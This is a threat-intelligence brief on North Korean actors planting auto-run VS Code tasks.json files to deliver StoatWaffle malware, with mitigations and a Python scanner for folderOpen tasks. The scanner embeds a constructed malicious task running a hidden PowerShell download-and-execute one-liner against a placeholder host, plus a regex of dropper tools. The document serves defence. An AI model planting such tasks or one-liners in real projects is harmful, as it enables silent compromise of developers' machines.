
North Korean Hackers Exploit VS Code Auto‑Run Tasks to Deploy StoatWaffle Malware

North Korean threat actors have begun embedding malicious .vscode/tasks.json files in VS Code projects. The planted task is marked to run automatically when the folder is opened, so the editor itself launches the commands that download the StoatWaffle malware family. The technique expands the attack surface of development environments and is a high‑risk supply‑chain threat for any organization whose developers open third‑party projects in VS Code.

🛡️ LiveThreat™ Intelligence · 📅 March 24, 2026· 📰 thehackernews.com
Severity: High
Type: ThreatIntel
Confidence: High
Affected: 4 sector(s)
Actions: 4 recommended
Source: thehackernews.com


What Happened — North Korean threat actors (attributed to the “Contagious Interview”/WaterPlum campaign) have begun shipping malicious .vscode/tasks.json files inside Microsoft Visual Studio Code projects. A task that declares "runOptions": {"runOn": "folderOpen"} starts as soon as a developer opens the folder in a trusted workspace, with no build or debug action required; the planted task uses that trigger to download and install the StoatWaffle malware family, and can hide its terminal output so the victim sees nothing. The technique has been observed in the wild since December 2025 and represents a novel supply‑chain abuse of a legitimate feature of a widely used development tool.

Why It Matters for TPRM

  • Developer workstations and their tooling are usually implicitly trusted; a compromised editor session gives attackers a foothold, often with source‑control and cloud credentials, inside otherwise hardened networks.
  • Third‑party code repositories, shared project templates and committed VS Code workspace settings become attack vectors, expanding the attack surface beyond traditional endpoints.
  • Because the task runs from a legitimate editor process and can suppress its own output, detection is difficult, increasing the risk of credential theft, data exfiltration and lateral movement.

Who Is Affected — Technology/SaaS vendors, financial services firms, healthcare IT departments, and any organization that allows developers to use VS Code or shared project templates.

Recommended Actions

  • Treat workspace configuration (.vscode/tasks.json, settings.json, launch.json and *.code-workspace files) as code: require it to pass code review, and block or quarantine any task that declares runOptions.runOn: "folderOpen". Restrict extension installation to a vetted set.
  • Disable automatic task execution in VS Code by setting task.allowAutomaticTasks to "off" via managed settings, and keep Workspace Trust enabled (security.workspace.trust.enabled) so that unreviewed repositories open in Restricted Mode, where folderOpen tasks do not run.
  • Deploy endpoint detection and response (EDR) rules that flag the VS Code process spawning PowerShell, cmd, node or a shell with download‑and‑execute arguments, and that alert on the creation of tasks.json files containing "folderOpen".
  • Scan third‑party code repositories and internal templates for auto‑run tasks before developers open them, and educate developers on supply‑chain hygiene (open unknown projects in Restricted Mode, read .vscode/ before trusting a folder).

Technical Notes — The abuse leverages VS Code’s built‑in task runner, configured in tasks.json, to execute PowerShell or Node.js commands that download the StoatWaffle payload. The trigger is the "runOptions": {"runOn": "folderOpen"} property, which VS Code honours only in trusted workspaces; the attacker can additionally set "presentation": {"reveal": "never"} so the task’s terminal never appears. No specific CVE is cited; the vector is a misuse of a legitimate feature. The malware is capable of credential dumping, keylogging and establishing persistence via scheduled tasks. Source: The Hacker News
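The scanner below is an added example for this brief; it is not code from The Hacker News, from the campaign it describes, or from any EDR product. It relies only on documented VS Code behaviour (a task starts on folder open when it carries "runOptions": {"runOn": "folderOpen"}, and tasks.json is JSONC, so comments and trailing commas must be stripped before parsing) and flags every auto‑run task it finds, with a heuristic download‑and‑execute check on the command line. The embedded tasks.json is constructed for illustration; the URL is a placeholder, and the keyword list is an assumption about common one‑liner droppers, not a signature for StoatWaffle.

```python
# Added example for this brief, not code from The Hacker News or the campaign
# it describes. Relies on documented VS Code behaviour: a task in
# .vscode/tasks.json (or the "tasks" section of a .code-workspace file) starts
# without user action when it declares "runOptions": {"runOn": "folderOpen"}.
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Constructed sample (URL is a placeholder, not a real payload): a benign build
# task beside an auto-run task that fetches and executes a remote script.
SAMPLE_TASKS_JSON = r'''{
    // tasks.json is JSONC: comments and trailing commas are legal here
    "version": "2.0.0",
    "tasks": [
        { "label": "build", "type": "shell", "command": "npm run build", },
        {
            "label": "setup",
            "type": "shell",
            "command": "powershell -NoProfile -w hidden -c \"irm https://example.invalid/s.ps1 | iex\"",
            "runOptions": { "runOn": "folderOpen" },
            "presentation": { "reveal": "never" },
        },
    ],
}'''

# One pass over the text: string literals are kept verbatim (so "https://" is
# never taken for a comment), comments are dropped, trailing commas removed.
_JSONC_TOKEN = re.compile(
    r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/|,(\s*[}\]])', re.DOTALL)

# Download-and-execute idioms seen in one-liner droppers (assumed heuristic,
# not a signature for any specific malware family).
_SUSPICIOUS = re.compile(
    r'(?i)\b(iex|invoke-expression|irm|invoke-restmethod|invoke-webrequest|curl|wget|'
    r'certutil|bitsadmin|mshta)\b|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden\b'
    r'|\bnode\s+-e\b|\bpython3?\s+-c\b|\|\s*(sh|bash)\b')


def jsonc_to_json(text: str) -> str:
    """Convert VS Code's JSONC dialect to strict JSON."""
    return _JSONC_TOKEN.sub(lambda m: m.group(1) or m.group(2) or "", text)


def _command_text(task: dict) -> str:
    """Flatten command and args, including windows/linux/osx overrides."""
    parts: List[str] = []
    for scope in [task] + [task.get(k) or {} for k in ("windows", "linux", "osx")]:
        cmd = scope.get("command")
        if isinstance(cmd, dict):            # {"value": ..., "quoting": ...} form
            cmd = cmd.get("value")
        parts.append(cmd if isinstance(cmd, str) else "")
        parts += [a if isinstance(a, str) else str(a.get("value", ""))
                  for a in scope.get("args") or []]
    return " ".join(p for p in parts if p)


def find_auto_run_tasks(tasks_json_text: str) -> List[Dict[str, object]]:
    """Return every task VS Code would start on folder open, with risk flags."""
    data = json.loads(jsonc_to_json(tasks_json_text))
    if isinstance(data.get("tasks"), dict):  # .code-workspace nests a tasks object
        data = data["tasks"]
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = _command_text(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
            "suspicious": bool(_SUSPICIOUS.search(cmd)),
        })
    return findings


def scan_tree(root: Path) -> List[Dict[str, object]]:
    """Scan a checkout (or a directory of clones) for auto-run tasks."""
    results = []
    for path in list(root.rglob(".vscode/tasks.json")) + list(root.rglob("*.code-workspace")):
        rel = str(path.relative_to(root))
        try:
            results += [{"file": rel, **f} for f in find_auto_run_tasks(path.read_text("utf-8"))]
        except (ValueError, OSError) as exc:   # an unparsable file is itself worth a look
            results.append({"file": rel, "error": str(exc)})
    return results


def demo_scan() -> List[Dict[str, object]]:
    """Write the constructed sample into a temporary checkout and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        vscode_dir = Path(tmp) / "repo" / ".vscode"
        vscode_dir.mkdir(parents=True)
        (vscode_dir / "tasks.json").write_text(SAMPLE_TASKS_JSON, encoding="utf-8")
        return scan_tree(Path(tmp))


if __name__ == "__main__":
    for hit in demo_scan():
        print(hit)
```

Run it against a directory of fresh clones before anyone opens them in the editor; the "build" task is ignored because it has no folderOpen trigger, while "setup" is reported as auto‑run, hidden and suspicious. Every folderOpen task is listed even when the keyword heuristic is silent, because an auto‑run task of any kind is something a reviewer should have approved explicitly.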

📰 Original Source
https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html

This LiveThreat Intelligence Brief is an independent analysis. Read the original reporting at the link above.
